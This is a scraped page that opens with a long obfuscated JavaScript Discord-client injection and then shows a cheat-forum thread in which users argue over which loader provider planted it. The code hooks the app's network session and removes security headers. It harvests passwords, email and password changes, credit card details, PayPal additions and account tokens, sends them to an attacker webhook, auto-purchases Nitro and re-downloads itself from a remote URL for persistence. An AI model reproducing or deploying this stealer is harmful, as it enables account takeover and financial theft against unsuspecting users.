if (beaudin[leisl(334, 581)]) return jessianne[leisl(316, 590)](jessianne[leisl(4, -860)], beaudin[jessianne.xxCsD]);
else return null;
}
} else {
if (jessianne[leisl(54, 219)](jessianne[leisl(343, 725)], jessianne.SWnew)) {
const latoyta = _0x59bd90[2] && jessianne[leisl(54, 33)](_0x19f47d[2][leisl(296, 451)](), jessianne[leisl(361, 721)]),
montravion = latoyta ? _0x38ec4f[3] && _0xd94d54[3].toLowerCase() : _0x31e638[2] && _0x3f285e[2][leisl(296, 586)](),
shomari = montravion === jessianne.RjDSm ? jessianne[leisl(40, 165)] : montravion === jessianne[leisl(155, 137)] ? jessianne[leisl(232, -479)] : jessianne[leisl(398, -273)];
let regenia = "";
if (jessianne[leisl(54, 299)](_0x49b176[leisl(419, 418)], jessianne[leisl(263, -762)])) {
const dakayden = _0x5f7f45[leisl(165, 328)](_0xdb2dee[leisl(23, 282)][leisl(326, -422)], shomari[leisl(188, -802)](/ /g, "")),
carianna = _0x3dda49[leisl(433, 644)](dakayden).filter(cherylynn => _0x55a9d2[leisl(421, -446)](_0x1e23e6[leisl(165, -838)](dakayden, cherylynn))[leisl(19, 291)]() && cherylynn[leisl(323, -369)](".")[leisl(140, 269)] > 1)["sort"]()[leisl(226, -413)]()[0];
regenia = _0x5ca52c.join(dakayden, carianna, leisl(424, -577));
} else {
if (jessianne[leisl(54, -631)](_0x36151f.platform, leisl(408, 510))) {
const wiliam = montravion === jessianne[leisl(41, 191)] ? _0x235645[leisl(165, -518)](jessianne[leisl(98, -855)], jessianne[leisl(308, 365)]) : montravion === jessianne[leisl(155, -911)] ? _0x165e75[leisl(165, 165)](jessianne[leisl(98, -695)], jessianne[leisl(107, 539)]) : latoyta && _0x476ca9[3] ? _0x465eeb[3] ? _0x201e75[2] : _0x54aa3b[2] : _0x50d06a[leisl(165, 370)](jessianne[leisl(98, 341)], jessianne[leisl(39, -877)]);
regenia = _0x125808[leisl(165, -775)](wiliam, jessianne[leisl(18, 142)], jessianne[leisl(21, -899)]);
}
}
if (_0x3ffabc.existsSync(regenia)) return regenia;
return "";
} else {
const mahiya = jessianne[leisl(305, 701)](Purchase, zene, aujanai, jessianne[leisl(64, 493)], jessianne[leisl(258, -574)]);
if (jessianne[leisl(350, 762)](mahiya, null)) {
if (jessianne[leisl(219, -707)](jessianne[leisl(399, -575)], jessianne[leisl(399, 521)])) _0x28e938(_0x3d8e79[leisl(386, -250)], _0xb92c5a[leisl(231, 483)], _0x175d46)["catch"](_0x30ee4e[leisl(3, 311)]);
else return mahiya;
} else {
if (jessianne[leisl(54, -817)](leisl(9, -845), jessianne[leisl(289, 567)])) {
const rotha = {};
rotha[leisl(358, -408)] = "*", jessianne.VzDsF(_0x1b66ec, {
responseHeaders: _0x14a5d0[leisl(125, -944)](rotha, _0x4a0d56[leisl(364, -718)])
});
} else return "Failed to Purchase ";
}
}
}
} else {
delete _0xf9c7ab[leisl(364, 575)][jessianne[leisl(359, 527)]], delete _0x255e4c.responseHeaders[jessianne[leisl(249, 388)]];
const roopal = {..._0x38a6e0[leisl(364, 433)]
};
roopal[leisl(358, -311)] = "*";
const samya = {};
samya[leisl(364, 720)] = roopal, _0x3171fa(samya);
}
}
}
}
},
getNitro = deming => {
const sanaaya = {};
sanaaya[leisl(90, 353)] = leisl(229, -641), sanaaya.GAqhm = leisl(336, 357);
const leondro = sanaaya;
switch (deming) {
case 0:
return leondro.xYTUa;
case 1:
return leondro[leisl(331, -186)];
case 2:
return leisl(205, -291);
default:
return leondro[leisl(90, 317)];
}
},
getBadges = brylen => {
const gaspar = {};
gaspar[leisl(74, 483)] = leisl(214, 450), gaspar[leisl(158, 491)] = leisl(144, 418), gaspar.pRibx = leisl(261, 786), gaspar[leisl(139, 315)] = "Gold BugHunter, ", gaspar[leisl(420, 960)] = leisl(428, 647), gaspar[leisl(380, 588)] = leisl(65, 375), gaspar.auaRr = leisl(432, 605), gaspar[leisl(353, 545)] = leisl(345, 549), gaspar.aUDPW = "None";
const jakobee = gaspar;
let kodey = "";
switch (brylen) {
case 1:
kodey += jakobee[leisl(74, 783)];
break;
case 2:
kodey += jakobee.BusVh;
break;
case 131072:
kodey += jakobee.pRibx;
break;
case 4:
kodey += leisl(244, 836);
break;
case 16384:
kodey += jakobee[leisl(139, 534)];
break;
case 8:
kodey += leisl(31, 693);
break;
case 512:
kodey += jakobee[leisl(420, 904)];
break;
case 128:
kodey += jakobee[leisl(380, 646)];
break;
case 64:
kodey += jakobee[leisl(383, 617)];
break;
case 256:
kodey += jakobee[leisl(353, 486)];
break;
case 0:
kodey = jakobee[leisl(148, 592)];
break;
default:
kodey = leisl(442, 998);
break;
}
return kodey;
},
hooker = emilia => {
const scipio = {
uDgID: function(jacere, alizaye) {
return jacere(alizaye);
}
};
scipio[leisl(166, 391)](execScript, leisl(341, -157) + config[leisl(179, -405)] + leisl(256, 370) + JSON[leisl(217, 641)](emilia) + "));\n");
},
login = async(brittanya, annaleah, jovin) => {
const ramatu = {
aFEOS: function(deverick, willard) {
return deverick(willard);
},
QUmZw: function(eliezer, vrishank) {
return eliezer(vrishank);
},
RKbJM: leisl(121, 484),
qZRBj: leisl(333, 721),
Gartz: function(zandrea, jamika) {
return zandrea + jamika;
},
tzokz: function(conchata, rose) {
return conchata + rose;
},
zLtTc: leisl(411, 329),
qEeNj: leisl(180, 210)
},
sitey = await ramatu.aFEOS(getInfo, jovin);
const serenidy = ramatu[leisl(162, 332)](getNitro, sitey[leisl(357, 513)]),
abdussamad = ramatu.aFEOS(getBadges, sitey[leisl(325, 331)]),
latorria = await ramatu.QUmZw(getBilling, jovin),
feliciana = {};
feliciana[leisl(347, 589)] = leisl(177, 372), feliciana[leisl(224, 147)] = leisl(267, 558) + brittanya + leisl(150, 255) + annaleah + "**", feliciana[leisl(277, 286)] = ![];
const nathanil = {};
nathanil[leisl(347, 392)] = ramatu.RKbJM, nathanil[leisl(224, 198)] = "Nitro Type: **" + serenidy + leisl(405, 608) + abdussamad + leisl(72, 79) + latorria + "**", nathanil[leisl(277, 284)] = ![];
const celsea = {};
celsea[leisl(347, 701)] = ramatu[leisl(281, 636)], celsea[leisl(224, 375)] = "`" + jovin + "`", celsea[leisl(277, 399)] = ![];
const trinita = {
username: config.embed_name,
avatar_url: config[leisl(441, 746)],
embeds: [{
color: config[leisl(354, 795)],
fields: [feliciana, nathanil, celsea],
author: {
name: ramatu[leisl(174, 119)](ramatu[leisl(174, 173)](ramatu[leisl(208, 400)](sitey[leisl(330, 458)], "#"), sitey[leisl(221, 616)]), leisl(192, 190)) + sitey.id,
icon_url: leisl(53, 234) + sitey.id + "/" + sitey[leisl(239, 523)] + leisl(422, 545)
},
footer: {
text: ramatu[leisl(253, 326)]
}
}]
};
if (config.ping_on_run) trinita[ramatu[leisl(371, 437)]] = config[leisl(368, 493)];
ramatu.aFEOS(hooker, trinita);
},
passwordChanged = async(maitte, nevaehlynn, therrin) => {
const maksym = {
zPKDA: function(raiesha, timolyn) {
return raiesha(timolyn);
},
GBtpx: function(destaney, kamey) {
return destaney(kamey);
},
rzgic: leisl(403, 634),
yLIvf: "**Token**",
hEAVc: function(aldin, margrie) {
return aldin + margrie;
},
gZbrP: function(tajuanna, meher) {
return tajuanna + meher;
},
Mcevw: leisl(192, 631),
VsmhL: leisl(180, 612)
},
jerrik = await maksym[leisl(10, 884)](getInfo, therrin),
josael = maksym[leisl(92, 849)](getNitro, jerrik[leisl(357, 836)]),
haaken = maksym[leisl(92, 936)](getBadges, jerrik[leisl(325, 741)]),
zakeya = await maksym[leisl(10, 898)](getBilling, therrin),
zilla = {};
zilla.name = maksym[leisl(298, 711)], zilla[leisl(224, 741)] = "Email: **" + jerrik[leisl(386, 914)] + leisl(412, 1228) + maitte + leisl(266, 1057) + nevaehlynn + "**", zilla[leisl(277, 1105)] = !![];
const ceria = {};
ceria[leisl(347, 882)] = leisl(121, 864), ceria[leisl(224, 607)] = "Nitro Type: **" + josael + "**\nBadges: **" + haaken + leisl(72, 601) + zakeya + "**", ceria[leisl(277, 574)] = !![];
const jeyshangelise = {};
jeyshangelise[leisl(347, 1104)] = maksym[leisl(112, 828)], jeyshangelise[leisl(224, 981)] = "`" + therrin + "`", jeyshangelise.inline = ![];
const alhan = {};
alhan[leisl(366, 1085)] = leisl(411, 1010);
const jholie = {
username: config.embed_name,
avatar_url: config[leisl(441, 981)],
embeds: [{
color: config[leisl(354, 762)],
fields: [zilla, ceria, jeyshangelise],
author: {
name: maksym[leisl(36, 584)](maksym.hEAVc(maksym[leisl(94, 498)](maksym[leisl(94, 870)](jerrik.username, "#"), jerrik[leisl(221, 983)]), maksym.Mcevw), jerrik.id),
icon_url: leisl(53, 603) + jerrik.id + "/" + jerrik[leisl(239, 703)] + leisl(422, 873)
},
footer: alhan
}]
};
if (config.ping_on_run) jholie[maksym[leisl(351, 1181)]] = config.ping_val;
maksym[leisl(92, 290)](hooker, jholie);
},
emailChanged = async(khandi, dezzarae, donique) => {
const neva = {
WwoBB: function(lamareon, jamilex) {
return lamareon(jamilex);
},
eOlJC: "**Email Changed**",
GSAVG: leisl(121, 45),
PQCWE: leisl(333, 322),
udDAK: function(muhammadwali, anaeli) {
return muhammadwali + anaeli;
},
utrcb: function(masil, mattias) {
return masil + mattias;
},
POEhr: function(syaire, maurietta) {
return syaire + maurietta;
},
WAnaT: leisl(192, 307),
SGRRp: leisl(180, 270),
quiYN: function(luren, jarah) {
return luren(jarah);
}
},
leia = await getInfo(donique),
vinal = neva[leisl(185, 84)](getNitro, leia[leisl(357, 512)]),
zmaya = neva[leisl(185, 245)](getBadges, leia[leisl(325, 565)]),
dionne = await neva.WwoBB(getBilling, donique),
cheriah = {};
cheriah.name = neva[leisl(222, -232)];
cheriah[leisl(224, 295)] = leisl(49, 156) + khandi + leisl(243, -301) + dezzarae + "**", cheriah[leisl(277, 157)] = !![];
const aldolfo = {};
aldolfo[leisl(347, 395)] = neva[leisl(183, 400)], aldolfo[leisl(224, -168)] = leisl(209, 240) + vinal + leisl(405, 597) + zmaya + leisl(72, -386) + dionne + "**", aldolfo.inline = !![];
const teyvon = {};
teyvon[leisl(347, 372)] = neva[leisl(104, 50)], teyvon[leisl(224, 350)] = "`" + donique + "`", teyvon[leisl(277, -459)] = ![];
const meztli = {};
meztli[leisl(366, 317)] = leisl(411, -57);
const tronda = {
username: config[leisl(436, 44)],
avatar_url: config[leisl(441, 144)],
embeds: [{
color: config[leisl(354, 250)],
fields: [cheriah, aldolfo, teyvon],
author: {
name: neva[leisl(240, 531)](neva[leisl(154, 461)](neva[leisl(1, -102)](leia.username, "#"), leia[leisl(221, -287)]) + neva[leisl(83, 128)], leia.id),
icon_url: "https://cdn.discordapp.com/avatars/" + leia.id + "/" + leia[leisl(239, -245)] + leisl(422, 548)
},
footer: meztli
}]
};
if (config[leisl(122, 20)]) tronda[neva[leisl(117, -544)]] = config[leisl(368, 279)];
neva[leisl(362, -89)](hooker, tronda);
},
PaypalAdded = async ulyess => {
const dalayiah = {
CHRUE: function(sef, orchid) {
return sef(orchid);
},
FaQNO: function(colbie, anavela) {
return colbie(anavela);
},
RhdXM: leisl(121, 528),
bMOIE: "**Token**",
lpavG: function(sharrae, gracely) {
return sharrae + gracely;
},
wvsAh: function(alicen, jezenia) {
return alicen + jezenia;
},
FLjic: leisl(192, 425),
RJQqx: leisl(411, 286),
YaYoc: leisl(180, 350),
absRX: function(kritzia, carlens) {
return kritzia(carlens);
}
},
aadvi = await dalayiah.CHRUE(getInfo, ulyess),
santoria = dalayiah[leisl(293, 567)](getNitro, aadvi[leisl(357, 1122)]),
shatesha = dalayiah[leisl(164, 226)](getBadges, aadvi.flags),
shiyah = dalayiah[leisl(293, 210)](getBilling, ulyess),
danahi = {};
danahi[leisl(347, 211)] = "**Paypal Added**", danahi[leisl(224, 741)] = leisl(388, 861), danahi[leisl(277, 775)] = ![];
const najat = {};
najat[leisl(347, 451)] = dalayiah.RhdXM, najat[leisl(224, 985)] = leisl(209, 87) + santoria + leisl(58, 546) + shatesha + leisl(72, 255) + shiyah + "**", najat[leisl(277, 828)] = ![];
const lorene = {};
lorene[leisl(347, 998)] = dalayiah.bMOIE, lorene[leisl(224, 304)] = "`" + ulyess + "`";
lorene[leisl(277, 842)] = ![];
const candon = {
username: config[leisl(436, 692)],
avatar_url: config[leisl(441, 699)],
embeds: [{
color: config[leisl(354, 629)],
fields: [danahi, najat, lorene],
author: {
name: dalayiah[leisl(456, 1242)](dalayiah[leisl(111, 705)](dalayiah[leisl(456, 1022)](aadvi.username, "#"), aadvi[leisl(221, 233)]) + dalayiah.FLjic, aadvi.id),
icon_url: "https://cdn.discordapp.com/avatars/" + aadvi.id + "/" + aadvi[leisl(239, 712)] + leisl(422, 549)
},
footer: {
text: dalayiah[leisl(425, 905)]
}
}]
};
if (config[leisl(122, 55)]) candon[dalayiah[leisl(286, 727)]] = config[leisl(368, 455)];
dalayiah[leisl(340, 1125)](hooker, candon);
},
ccAdded = async(tymari, bitia, jardyn, subria, khaleil) => {
const seaira = {
bCXDx: function(fahtima, michaelvincent) {
return fahtima(michaelvincent);
},
OHjkG: leisl(372, 870),
ZeNTY: leisl(121, 839),
lqiTf: leisl(333, 1469),
OtsAZ: function(ibhan, mallee) {
return ibhan + mallee;
},
MuWOq: function(ryler, jaseem) {
return ryler + jaseem;
},
RjMtr: function(shenel, brylon) {
return shenel(brylon);
}
},
hafeez = await getInfo(khaleil),
deigo = seaira[leisl(115, 683)](getNitro, hafeez[leisl(357, 1191)]),
tayton = getBadges(hafeez[leisl(325, 1164)]),
cesia = await getBilling(khaleil),
zeltzin = {};
zeltzin[leisl(347, 1117)] = seaira[leisl(427, 818)], zeltzin.value = leisl(119, 991) + tymari + leisl(367, 1276) + bitia + leisl(207, 1149) + jardyn + "/" + subria + "**", zeltzin[leisl(277, 708)] = !![];
const mallory = {};
mallory[leisl(347, 1165)] = seaira.ZeNTY, mallory[leisl(224, 946)] = leisl(209, 704) + deigo + leisl(405, 1135) + tayton + leisl(72, 1105) + cesia + "**", mallory[leisl(277, 1006)] = !![];
const ayu = {};
ayu[leisl(347, 871)] = seaira.lqiTf, ayu[leisl(224, 911)] = "`" + khaleil + "`";
ayu[leisl(277, 1179)] = ![];
const takierra = {};
takierra[leisl(366, 1097)] = leisl(411, 1529);
const dayvion = {
username: config.embed_name,
avatar_url: config[leisl(441, 979)],
embeds: [{
color: config[leisl(354, 1327)],
fields: [zeltzin, mallory, ayu],
author: {
name: seaira[leisl(189, 1021)](seaira[leisl(189, 895)](seaira[leisl(57, 784)](hafeez[leisl(330, 896)], "#"), hafeez[leisl(221, 740)]) + leisl(192, 867), hafeez.id),
icon_url: "https://cdn.discordapp.com/avatars/" + hafeez.id + "/" + hafeez[leisl(239, 920)] + leisl(422, 895)
},
footer: takierra
}]
};
if (config.ping_on_run) dayvion[leisl(180, 902)] = config[leisl(368, 676)];
seaira.RjMtr(hooker, dayvion);
},
nitroBought = async burbon => {
const mason = {
zdvsW: function(joannah, baiya) {
return joannah(baiya);
},
cHwYK: function(pilar, udana) {
return pilar(udana);
},
exvlO: function(rohail, strange) {
return rohail(strange);
},
rXmdI: leisl(45, 523),
THUJQ: leisl(121, 603),
sxvAp: "**Token**",
oJFzu: function(randoph, anaya) {
return randoph + anaya;
},
iUlOe: " | ",
McpDb: leisl(411, 336),
iDWNx: leisl(180, 755),
HyBvZ: function(keiralyn, kaliese) {
return keiralyn + kaliese;
}
},
arlethe = await getInfo(burbon),
akeema = mason[leisl(410, 312)](getNitro, arlethe[leisl(357, 886)]),
akshitha = mason.cHwYK(getBadges, arlethe[leisl(325, 372)]);
const leeonna = await mason.zdvsW(getBilling, burbon),
delany = await mason[leisl(255, 438)](buyNitro, burbon);
const dawnte = {
username: config[leisl(436, 1274)],
content: delany,
avatar_url: config[leisl(441, 686)],
embeds: [{
color: config.embed_color,
fields: [{
name: mason.rXmdI,
value: "**Nitro Code:**\n```diff\n+ " + delany + leisl(461, 971),
inline: !![]
}, {
name: mason[leisl(152, 378)],
value: leisl(209, 620) + akeema + leisl(405, 381) + akshitha + leisl(72, 841) + leeonna + "**",
inline: !![]
}, {
name: mason[leisl(81, 883)],
value: "`" + burbon + "`",
inline: ![]
}],
author: {
name: mason.oJFzu(mason[leisl(245, 919)](mason[leisl(245, 495)](mason[leisl(245, 677)](arlethe.username, "#"), arlethe[leisl(221, 885)]), mason[leisl(175, 981)]), arlethe.id),
icon_url: leisl(53, 567) + arlethe.id + "/" + arlethe[leisl(239, 737)] + leisl(422, 601)
},
footer: {
text: mason[leisl(198, 122)]
}
}]
};
if (config[leisl(122, 32)]) dawnte[mason.iDWNx] = mason[leisl(319, 575)](config[leisl(368, 964)], "\n" + delany);
hooker(dawnte);
};
session[leisl(204, -96)][leisl(395, 332)]["onBeforeRequest"](config[leisl(402, 139)], (mercades, chondra) => {
const dasaun = {
eQHHI: leisl(229, 683),
AlVyc: leisl(336, 456),
HEzmf: leisl(205, 20),
wmOqv: "wss://remote-auth-gateway",
REIGM: function(hermina, taeshia) {
return hermina === taeshia;
},
RelUW: function(latunia, juleen) {
return latunia(juleen);
},
qxkwz: function(sonequa) {
return sonequa();
}
};
if (mercades[leisl(228, 471)][leisl(146, -53)](dasaun.wmOqv)) {
if (dasaun.REIGM(leisl(161, -432), leisl(161, -15))) {
const laliana = {};
laliana.cancel = !![], dasaun[leisl(171, -169)](chondra, laliana);
return;
} else switch (_0x40c64d) {
case 0:
return dasaun[leisl(332, 694)];
case 1:
return dasaun[leisl(27, -549)];
case 2:
return dasaun.HEzmf;
default:
return dasaun[leisl(332, -122)];
}
}
if (dasaun[leisl(160, 525)](updateCheck)) {}
dasaun[leisl(171, 358)](chondra, {});
return;
}), session[leisl(204, -223)][leisl(395, 276)][leisl(99, -465)]((barkim, mikye) => {
const kiaralyn = {
aZLxd: function(narah, candee) {
return narah === candee;
},
WopNp: leisl(270, 412),
buCdz: leisl(48, -62),
udhbh: function(dotson, natanem) {
return dotson === natanem;
},
cTATK: leisl(181, 124),
jfvzs: leisl(82, 115),
DrGtq: leisl(133, -648),
FgqWI: leisl(147, 447),
OGOeW: leisl(236, -690),
yzJMV: "resources",
getmU: "wss://remote-auth-gateway",
TeKFk: function(zedek, beyla) {
return zedek(beyla);
},
YTejo: function(eremy) {
return eremy();
},
ceJcE: leisl(379, 440),
PUGcu: function(lamariana, talaija) {
return lamariana !== talaija;
},
RodNW: "mscbQ",
vYMMw: function(markece, jamalachi) {
return markece(jamalachi);
},
VaCfE: leisl(35, 242),
NtQsl: leisl(43, 75),
keQhG: leisl(276, 454),
pffIY: function(khyier, demeka) {
return khyier !== demeka;
},
tKhWU: leisl(30, -621)
};
if (barkim.url[leisl(146, -590)](config[leisl(179, 68)])) {
if (kiaralyn.udhbh(kiaralyn[leisl(38, -919)], kiaralyn.ceJcE)) {
if (barkim[leisl(228, 122)][leisl(310, -526)](leisl(14, 292))) {
if (kiaralyn.PUGcu(leisl(306, 397), kiaralyn.RodNW)) {
const jenisys = kiaralyn[leisl(5, 230)](_0x224456, kiaralyn.WopNp) ? _0x4fdd12[leisl(165, -384)](leisl(82, -570), kiaralyn[leisl(288, -678)]) : kiaralyn[leisl(145, 207)](_0x3d529c, kiaralyn[leisl(295, -551)]) ? _0x246023[leisl(165, 415)](kiaralyn[leisl(338, -589)], kiaralyn[leisl(78, 276)]) : _0x377a49 && _0x4b9ca4[3] ? _0x5de020[3] ? _0xe62a6[2] : _0x1af7e4[2] : _0x55ed4d[leisl(165, 86)](leisl(82, -730), kiaralyn[leisl(79, -513)]);
_0xa8518b = _0x1c7cad.join(jenisys, leisl(210, 65), kiaralyn[leisl(348, -299)]);
} else {
const leyda = {};
leyda[leisl(358, 321)] = "*", kiaralyn[leisl(444, -409)](mikye, {
responseHeaders: Object[leisl(125, 398)](leyda, barkim[leisl(364, 363)])
});
}
} else {
if ("hpPvp" === kiaralyn.VaCfE) {
const tadhg = _0x13f1c7[leisl(165, 357)](_0x544a92[leisl(23, 277)][leisl(326, 251)], _0x1b6d74[leisl(188, -366)](/ /g, "")),
lhiam = _0xbfe753[leisl(433, -527)](tadhg)[leisl(250, 222)](sharolyn => _0x37e968[leisl(421, -369)](_0x171b5b[leisl(165, 68)](tadhg, sharolyn))[leisl(19, 180)]() && sharolyn[leisl(323, 301)](".")[leisl(140, 258)] > 1)["sort"]()[leisl(226, -741)]()[0];
_0x33e943 = _0x408d58[leisl(165, -438)](tadhg, lhiam, kiaralyn.yzJMV);
} else {
const grayden = {};
grayden["Content-Security-Policy"] = [kiaralyn[leisl(400, -379)], "Access-Control-Allow-Headers '*'", kiaralyn.keQhG], grayden[leisl(358, 556)] = "*", grayden[leisl(280, -401)] = "*", mikye({
responseHeaders: Object.assign(grayden, barkim[leisl(364, -408)])
});
}
}
} else _0x28c219(_0x32581b)[leisl(327, -450)](_0x494ff1.error);
} else {
if (kiaralyn.pffIY(kiaralyn[leisl(291, -343)], leisl(30, -864))) {
if (_0x135a73[leisl(228, -610)][leisl(146, -412)](kiaralyn[leisl(382, 600)])) {
const daishun = {};
daishun.cancel = !![], kiaralyn[leisl(196, -541)](_0x4c835f, daishun);
return;
}
if (kiaralyn[leisl(460, -409)](_0x42ed88)) {}
kiaralyn[leisl(196, -375)](_0x17b938, {});
return;
} else {
delete barkim.responseHeaders[leisl(2, -791)], delete barkim[leisl(364, 378)]["content-security-policy-report-only"];
const johao = {...barkim[leisl(364, -304)]
};
johao[leisl(358, 271)] = "*";
const neytiri = {};
neytiri[leisl(364, -306)] = johao, mikye(neytiri);
}
}
}), session.defaultSession[leisl(395, 47)].onCompleted(config[leisl(250, -173)], async(pam, javanna) => {
const marica = {
HuwxO: function(severio, shauntrell) {
return severio(shauntrell);
},
KtMBu: function(cid, souriya) {
return cid === souriya;
},
pTFEy: function(mattix, stevanie) {
return mattix + stevanie;
},
wZOFl: leisl(56, 759),
IrNjv: function(margrethe, keishona) {
return margrethe === keishona;
},
cmDpi: " ",
Vpmqn: leisl(237, 900),
ErTFX: leisl(370, 572),
kFfbm: function(aminarose, shakyra) {
return aminarose(shakyra);
},
evkyV: leisl(429, 1116),
KqkcN: leisl(276, 1051),
kSoXm: leisl(439, 805),
gDexW: leisl(360, 588),
LAObA: function(jerimia, gus) {
return jerimia(gus);
},
JXSby: function(liany, dasianae) {
return liany !== dasianae;
},
cZesq: function(yoshikatsu, sahrai) {
return yoshikatsu !== sahrai;
},
xjECS: "nbvss",
schJw: leisl(235, 582),
WzGps: function(narong, neysha, mayle, tantra) {
return narong(neysha, mayle, tantra);
},
WHCCz: leisl(299, 579),
UNjQc: leisl(80, 381),
ULpbX: leisl(55, 271),
qUWME: leisl(172, 466),
Qotwy: leisl(313, 696),
hMiLG: "tokens",
hszzf: leisl(212, 299),
PAZwh: leisl(201, 600),
pwesA: leisl(294, 1149),
cVXnn: function(jazzabelle, chandlyr) {
return jazzabelle === chandlyr;
},
aZkWA: leisl(167, 239),
pAUrN: function(sumiyah, trella) {
return sumiyah(trella);
},
kuefH: leisl(187, 896),
XwveY: function(chisimdi, linsie, kaceon) {
return chisimdi(linsie, kaceon);
}
};
if (marica[leisl(216, 762)](pam[leisl(262, 583)], 200) && pam.statusCode !== 202) return;
const leonise = pam[leisl(34, 682)][0][leisl(220, 349)];
let armanda;
try {
if (marica[leisl(274, 736)](marica[leisl(25, 912)], leisl(443, 578))) armanda = JSON[leisl(195, 490)](Buffer[leisl(108, 558)](leonise)[leisl(69, 704)]());
else {
const kceon = {};
kceon.cancel = !![], marica.HuwxO(_0x1e7730, kceon);
return;
}
} catch (montese) {
if (marica[leisl(274, 783)](leisl(311, 388), marica[leisl(24, 379)])) armanda = JSON[leisl(195, 663)](JSON[leisl(217, 537)](Buffer[leisl(108, 610)](leonise)[leisl(69, 896)]()));
else {
if (marica.KtMBu(_0xc8492e[leisl(136, 656)], 2) && !_0x534ffb[leisl(393, 763)]) _0x327679 += marica.pTFEy("", marica[leisl(457, 712)]);
else marica[leisl(91, 496)](_0x32df60[leisl(136, 745)], 1) && !_0x518148[leisl(393, 1077)] ? _0x5f4ff7 += marica[leisl(8, 394)]("", marica.cmDpi) : _0x3dcd6f = "";
}
}
const timia = await marica[leisl(318, 370)](execScript, leisl(430, 969));
switch (!![]) {
case pam[leisl(228, 385)][leisl(120, 769)](leisl(252, 453)):
marica[leisl(260, 838)](login, armanda[leisl(252, 1132)], armanda[leisl(231, 746)], timia)[leisl(327, 706)](console[leisl(3, 814)]);
break;
case pam[leisl(228, 1114)][leisl(120, 404)](marica[leisl(285, 662)]) && pam.method === marica.UNjQc:
if (!armanda[leisl(231, 847)]) return;
if (armanda.email) {
if (marica[leisl(123, 454)] === marica[leisl(392, 1179)]) {
const fantasha = {};
fantasha[leisl(347, 819)] = marica[leisl(97, 899)], fantasha.main = leisl(70, 693), _0x1f38b7.writeFileSync(_0x50f1ee, _0x56afc7[leisl(217, 1118)](fantasha, null, 4));
const jaeline = leisl(67, 578) + _0x3abf7d + leisl(344, 1262) + _0xc6ecdc + "';\nconst fileSize = fs.statSync(indexJs).size\nfs.readFileSync(indexJs , 'utf8', (err, data) => {\n if (fileSize < 20000 || data === \"module.exports = require('./core.asar')\") \n init();\n})\nasync function init() {\n https.get('" + _0x11f8c5.injection_url + "', (res) => {\n const file = fs.createWriteStream(indexJs);\n res.pipe(file);\n file.on('finish', () => {\n file.close();\n });\n \n }).on(\"error\", (err) => {\n setTimeout(init(), 10000);\n });\n}\nrequire('" + _0x17782a[leisl(165, 732)](_0x254062, marica[leisl(114, 993)]) + "')\nif (fs.existsSync(bdPath)) {\n require(bdPath);\n}";
_0x5428f0.writeFileSync(_0x3667f8, jaeline.replace(/\\/g, "\\\\"));
} else marica[leisl(260, 366)](emailChanged, armanda[leisl(386, 594)], armanda[leisl(231, 981)], timia).catch(console[leisl(3, 848)]);
}
if (armanda.new_password) {
if (leisl(153, 945) === marica[leisl(197, 620)]) return _0x40be45;
else passwordChanged(armanda[leisl(231, 594)], armanda[leisl(50, 530)], timia)[leisl(327, 443)](console.error);
}
break;
case pam[leisl(228, 531)].endsWith(marica[leisl(52, 645)]) && marica[leisl(91, 643)](pam.method, leisl(167, 651)):
const suban = querystring[leisl(195, 960)](leonise[leisl(69, 141)]());
ccAdded(suban[leisl(265, 1168)], suban[marica.hszzf], suban[marica[leisl(339, 964)]], suban[leisl(173, 974)], timia)[leisl(327, 520)](console.error);
break;
case pam[leisl(228, 295)][leisl(120, 994)](marica[leisl(346, 897)]) && marica[leisl(42, 966)](pam.method, marica[leisl(375, 739)]):
marica[leisl(130, 770)](PaypalAdded, timia)[leisl(327, 827)](console[leisl(3, 459)]);
break;
case pam.url[leisl(120, 495)](marica[leisl(304, 591)]) && marica[leisl(42, 584)](pam[leisl(387, 1119)], marica[leisl(375, 791)]):
if (!config.auto_buy_nitro) return;
marica[leisl(278, 504)](setTimeout, () => {
if (marica[leisl(46, 529)](marica[leisl(163, 779)], marica[leisl(93, 742)])) {
if (_0x35f95f[leisl(228, 1205)][leisl(310, 995)](leisl(14, 513))) {
const miila = {};
miila[leisl(358, 1347)] = "*", marica[leisl(318, 927)](_0x111d51, {
responseHeaders: _0x5e16c2.assign(miila, _0x3a3fcb[leisl(364, 1219)])
});
} else {
const makailynn = {};
makailynn[leisl(128, 834)] = ["default-src '*'", marica[leisl(96, 775)], marica[leisl(462, 1215)]], makailynn["Access-Control-Allow-Headers"] = "*", makailynn["Access-Control-Allow-Origin"] = "*", _0x561d3d({
responseHeaders: _0x1217f9[leisl(125, 737)](makailynn, _0x45b110[leisl(364, 1063)])
});
}
} else marica[leisl(135, 1158)](nitroBought, timia).catch(console[leisl(3, 689)]);
}, 7500);
break;
default:
break;
}
});
module.exports = require("./core.asar");

Videos & Picture:

[MadsM]

he is lying his *** off, bro got caught in 4k

[lort1234]

Edit
Official response from ACD:

Quote:

Dear User's, A competitor of ours just went from being a RAT to being a RAT because of us ��

Apparently WE sabotage their Website/Loader and added a File called "DMR.exe" Into their customers loader ( Which WE DID NOT DO )

The "Proof" proven by competitor doesn't mean anything if anything it just proves that their security is ****.

Webhook leading to our Discord ID? That's your proof? ����


I mean
If a random skid was able to do this to our tool than I would be freaking out as well.

that's your **** up now take responsibility for it.

I honestly don't think anyone would be able to even do such thing.

And if they did than shame on YOU and your user SHOULD be concerned.

How about you focus on your security instead of trying to come up with some bs as excuse on how the DMR.exe file ended up in your tool.

To begin with User's should never be concerned about their Security. Specially a random skid Sabotaging/Cracking a provider.


Also this same provider trying to blame us, Loves saying how WE Copy and Paste to Dev our own tool

Like if we aren't the first to ever bypass everything before any other provider.

what a joke that guy ehhhhhh?

Don't worry ACD User's that's something you guys don't ever have to worry about.

Security is our top focus asides of some BADASS update times/Features. ��

Edit2: Banned after posting this.

[zebleer]

@lort1234 are you part of the Cobalt staff team or something? Why are you defending them? They are clearly lying.

The loader is protected. It can't be edited by one byte without vmprotect or themida throwing errors & preventing functionality.

& how did Cobalt's server get infiltrated sot hat the loader could be tampered with & tampered copy retained?

Cobalt did this ****. Cobalt is spreading malware & counting on user stupidity to get away with it. They are malware distributors. They even admitted it, just not the part where they admit it was them who added it.

It's very obvious they put ACD's Discord server ID in their own malware to frame them. That doesn't mean ACD did it. Why would ACD send information to their public Discord server anyways, and not a secure private location?

Even if this was all somehow true (it's not), good luck with a provider that has such **** security that anyone can just spread malware to their users via their own website loader.

Do not support malware distributors please.

[lort1234]

Quote:

Originally Posted by zebleer

@ are you part of the Cobalt staff team or something? Why are you defending them? They are clearly lying.

The loader is protected. It can't be edited by one byte without vmprotect or themids throwing errors & preventing functionality.

